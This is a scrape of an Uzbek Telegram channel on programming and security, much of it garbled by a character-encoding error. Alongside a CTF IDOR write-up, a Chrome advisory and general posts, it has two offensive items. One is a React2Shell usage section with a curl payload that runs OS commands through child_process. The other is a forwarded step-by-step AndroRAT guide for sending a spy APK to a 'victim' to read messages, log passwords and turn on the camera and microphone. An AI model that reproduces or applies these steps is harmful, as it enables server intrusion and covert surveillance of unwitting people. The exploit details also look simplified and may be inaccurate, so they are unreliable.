๐—ข๐˜‡๐—ผ๐—ฑ๐—ฏ๐—ฒ๐—ธ๐——๐—ฒ๐˜ƒ
371 subscribers
136 photos
65 videos
76 files
117 links
Dasturlash | Kiberxavfsizlik | Shaxsiy blog
.............................................................................
Build Break Secure

@ozodbekdevv | @dasturchichoyxonasi
Download Telegram
#metroda
Buildroot โ€“ bu oโ€˜rnatiladigan qurilmalar (embedded systems) uchun minimal Linux tizimini yigโ€˜ishga moโ€˜ljallangan build tizim. Odatda monitorlar, routerlar, sanoat panellari va transport displeylarida ishlatiladi, yaโ€™ni bu oddiy kompyuter emas โ€” maxsus qurilma ichida ishlaydigan kichik Linux tizimi

@uzcodingblog
space.html
13 KB
ozodbekdev.uz/space website kodi

โ—๏ธTashqi browserda oching, telegram da emas

@uzcodingblog
Please open Telegram to view this post
VIEW IN TELEGRAM
5โค3
๐Ÿ” Nishon: ozodbekdev.uz/ctf

Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak

๐ŸงญZaiflik darajasi: oddiy

๐Ÿ˜ˆ Tizimni muvaffaqiyatli buzib kirganlar izohlarda skrinshot qoldirsin

#CyberLab
Please open Telegram to view this post
VIEW IN TELEGRAM
๐—ข๐˜‡๐—ผ๐—ฑ๐—ฏ๐—ฒ๐—ธ๐——๐—ฒ๐˜ƒ
๐Ÿ” Nishon: ozodbekdev.uz/ctf Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradiโ€ฆ
https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI

Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.

Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.
๐Ÿ’ 8 mart - Xalqaro xotin-qizlar kuni

Yurtimizning muhtaram va aziz ayollari!


Sizlarni 8 mart โ€” Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning oโ€˜rni beqiyosdir. Sizlar oโ€˜zingizning fidokorona mehnatingiz, yuksak masโ€™uliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qoโ€˜shib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sogโ€˜liq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, masโ€™uliyatli faoliyatingizda ulkan yutuqlar tilayman!

@ozodbekdevv
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ€๐Ÿ”ฅ4โค2๐Ÿ’˜1
Forwarded from UzCERT Live
โš ๏ธ Google Chromeโ€™da aniqlangan yangi โ€œZero-Dayโ€ zaifliklar: foydalanuvchilarga zudlik bilan yangilanish oโ€˜rnatish tavsiya etiladi

๐Ÿ“ฑ Google kompaniyasi oโ€˜zining mashhur brauzeri โ€” Google Chrome uchun favqulodda xavfsizlik yangilanishini eโ€™lon qildi. Sababi โ€” brauzerda aniqlangan ikki muhim zero-day zaiflik allaqachon real kiberhujumlarda faol qoโ€˜llanilayotgani tasdiqlangan.

๐Ÿ’ป Mutaxassislarning maโ€™lumotiga koโ€˜ra, ushbu zaifliklar yordamida hujumchilar foydalanuvchi tizimida zararli kodni ishga tushirishi, brauzer xavfsizlik mexanizmlarini chetlab oโ€˜tishi hamda qurilma ustidan nazoratni qoโ€˜lga kiritishi mumkin.

โœ… Mazkur tahdidni bartaraf etish maqsadida Chrome brauzerining 146.0.7680.75/76 versiyasi Windows va macOS tizimlari uchun, 146.0.7680.75 versiyasi esa Linux uchun chiqarildi. Yangilanish bosqichma-bosqich tarzda butun dunyo foydalanuvchilariga yetkazilmoqda.

๐Ÿ“ฑ Batafsil

#Google #Chrome #Windows #macOS #Linux #zaiflik
๐Ÿš€ UZCERT xizmatining rasmiy telegram sahifasiga aโ€™zo boโ€˜ling!
Please open Telegram to view this post
VIEW IN TELEGRAM
React2Shell (CVE-2025-55182)

Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC โ€œFlight protocolโ€ maสผlumotlarini notoสปgสปri qayta ishlash bilan bogสปliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan

- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taสผsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 โ€“ 10.0 (Critical)

@uzcodingblog
5โค1
Foydalanish:
Ushbu zaiflikdan faqat React oสปrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com

Foydalanilgan texnologiyalar orasida React mavjud boสปlsa bu serverda React2Shell zaifligi boสปlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'

Bu orqali server terminalida whois buyrugสปini berdik va javob ubuntu tarzida chiqadi

@uzcodingblog
This media is not supported in your browser
VIEW IN TELEGRAM
โค4
This media is not supported in the widget
VIEW IN TELEGRAM
๐Ÿ”ฅ4
Backup nima va nima uchun muhim?

Dasturchi sifatida eng katta xatolardan biri โ€” maโ€™lumotlarga haddan tashqari ishonib qoโ€˜yish. Hammasi joyida ishlayotgandek tuyuladi, lekin bitta xatolik, serverdagi nosozlik yoki oddiygina notoโ€˜gโ€˜ri oโ€˜chirish butun loyihani yoโ€˜qqa chiqarishi mumkin. Backup aynan shunday vaziyatlar uchun kerak. Bu โ€” maโ€™lumotlarning zaxira nusxasi boโ€˜lib, kerak boโ€˜lganda tizimni oldingi holatiga qaytarish imkonini beradi. Ayniqsa production tizimlarda backup yoโ€˜qligi katta xavf hisoblanadi. Koโ€˜pincha muammo yuz bergandan keyin backup haqida oโ€˜ylay boshlashadi. Aslida esa bu oldindan yoโ€˜lga qoโ€˜yilishi kerak boโ€˜lgan jarayon. Oddiy qilib aytganda, backup โ€” bu sizning โ€œplan Bโ€ingiz. Yaxshi yondashuv esa juda murakkab emas: muntazam backup olish, uni bir nechta joyda saqlash va vaqti-vaqti bilan tiklab koโ€˜rish. Shunda siz kutilmagan holatlarda ham xotirjam ishlay olasiz

Backup qilinmagan loyiha โ€” bu har doim xavf ostidagi loyiha.

@uzcodingblog
๐ŸŒ™Ramazon Hayiti muborak boโ€˜lsin!
7โค2
Erkaklar oสปzi begสปubor mavjudotlar ๐ŸŽฉ
๐Ÿ˜6โค2๐Ÿ’‹2
Ko'pchiligimiz bilamiz DoS,  DDoS hujumlar nima ekanligi va qanday vazifa bajarishini. Lekin ko'pchilik adashadigan qism bu ikkalasini farqi nimada? Aksariyat sohaga yangi kirganlar ikkisini bir narsa deb o'ylashadi, ammo bunday emas โ€” nomi oโ€˜xshash, lekin darajasi va taโ€™siri jihatidan ancha farq qiladi. Batafsilroq tushuntiradigan bo'lsam:

DoS (Denial of Service) โ€” bu bitta manbadan amalga oshiriladigan hujum. Oddiy qilib aytganda, bitta qurilma serverga juda koโ€˜p soโ€˜rov yuboradi va uni ortiqcha yuklab qoโ€˜yadi. Natijada server javob bera olmay qoladi yoki butunlay ishlamaydi. Bunday hujumni aniqlash va bloklash nisbatan oson โ€” odatda bitta IP manzilni yopish yetarli boโ€˜ladi.

DDoS (Distributed Denial of Service) esa ancha murakkab. Bu yerda hujum bitta emas, balki minglab yoki hatto millionlab qurilmalardan bir vaqtda amalga oshiriladi. Koโ€˜pincha bu qurilmalar botnet boโ€˜ladi, yaโ€™ni oldindan zararlangan kompyuterlar yoki IoT qurilmalar. Har biri alohida soโ€˜rov yuboradi, lekin umumiy bosim serverni yiqitadi.

Asosiy farq โ€” DoS bitta nuqtadan keladi, DDoS esa tarqatilgan. Shu sababli DDoSโ€™ni aniqlash ham, himoyalanish ham ancha qiyin. IP bloklash bu yerda deyarli foyda bermaydi.


@uzcodingblog
2๐Ÿ”ฅ3โค1๐Ÿ‘1
Forwarded from V1RU5_team
๐Ÿ‘ AndroRAT nima?
Bu โ€“ sizga boshqa odamning telefonini masofadan boshqarish imkonini beradigan dastur.
Yaโ€™ni siz oโ€˜z kompyuteringizda oโ€˜tirib, qurbonning telefonidagi hamma narsani koโ€˜rasiz va boshqarasiz.

---

Nimalarni qila oladi?
- Telefon qayerda turganini koโ€˜rsatadi ๐Ÿ“
- Mikrofonni yoqib, atrofdagi ovozlarni eshitasiz ๐ŸŽ™
- Kamera bilan surat olish mumkin ๐Ÿ“ธ
- Xabarlar, kontaktlar, qoโ€˜ngโ€˜iroqlar roโ€˜yxati sizda boโ€˜ladi โœ๏ธ
- Telefonga fayl yuklash yoki undan fayl olib ketish mumkin ๐Ÿ“‚
- Klaviaturada nima yozilganini koโ€˜rasiz (parollar ham) key โŒจ๏ธ
- Telefonni bloklash, ovoz chiqarish, titratish mumkin โ›”๏ธ

---

Qanday ishlatiladi? (hech narsa bilmagan uchun ham tushunarli)

1. Kompyuterga server dasturini yuklab oling (bu AndroRAT ning boshqaruv paneli).
2. Serverda sozlamalarni kiriting:
- Oโ€˜z IP manzilingizni yozing (qurbon telefoni sizga ulanishi uchun).
- Kerakli funksiyalarni belgilang (masalan, kamerani yoqish, xabarlarni oโ€˜qish).
3. Bir tugma bilan APK fayl yasang (bu dastur telefonga oโ€˜rnatiladi).
4. Shu APK faylni qurbonga yuboring (Telegram, WhatsApp, har qanday usul).
5. Qurbon uni oโ€˜rnatishi kerak.
*Oโ€˜rnatish uchun telefonda โ€œNomaโ€™lum manbalarโ€ ruxsatini yoqish talab qilinadi.*
6. Qurbon dasturni ochgan zahoti sizning kompyuteringizda telefon paydo boโ€˜ladi.
7. Endi sichqoncha bilan bosib, istalgan buyruq bering: kamera, mikrofon, fayl olish โ€“ hammasi bir-ikki sekundda ishlaydi.

---

๐Ÿ‘ฎโ€โ™€ Keyingi mavzu nima haqida bo'lsin?
Please open Telegram to view this post
VIEW IN TELEGRAM
โœ…Web-sayt va Telegram bot โ€” biznesingiz uchun zamonaviy yechimlar!

๐Ÿ•ตโ€โ™‚ Fullstack dasturchi sifatida quyidagi xizmatlarimni taklif qilaman

๐ŸŒ Web-saytlar โ€“ tezkor, zamonaviy, mobil qurilmalarga mos va brendingizga mos dizayn bilan.


๐Ÿค– Telegram botlar โ€“ buyurtma, toโ€˜lov, mijozlar bilan aloqa kabi jarayonlarni avtomatlashtirish imkoniyati.

๐Ÿ’ก Nega bu muhim?
โœ…Biznesingiz raqamli maydonga chiqadi

๐Ÿ”ŽMijozlar bilan aloqa yengillashadi

๐Ÿ–ฅIsh jarayonlari optimallashtiriladi

๐Ÿ‘คImidjingiz va ishonchingiz ortadi

๐Ÿ“ˆSotuvlar va daromad oโ€˜sadi


๐Ÿ‘จโ€๐Ÿ’ผ Har bir loyiha individual yondashuv bilan ishlab chiqiladi โ€” sizning maqsadingiz biz uchun ustuvor!


โœ‰๏ธ Bogโ€˜lanish: @ozodbekdevv | +998932426002

๐Ÿš€ Zamonaviy texnologiyalar โ€“ sizning rivojlanishingiz uchun xizmat qiladi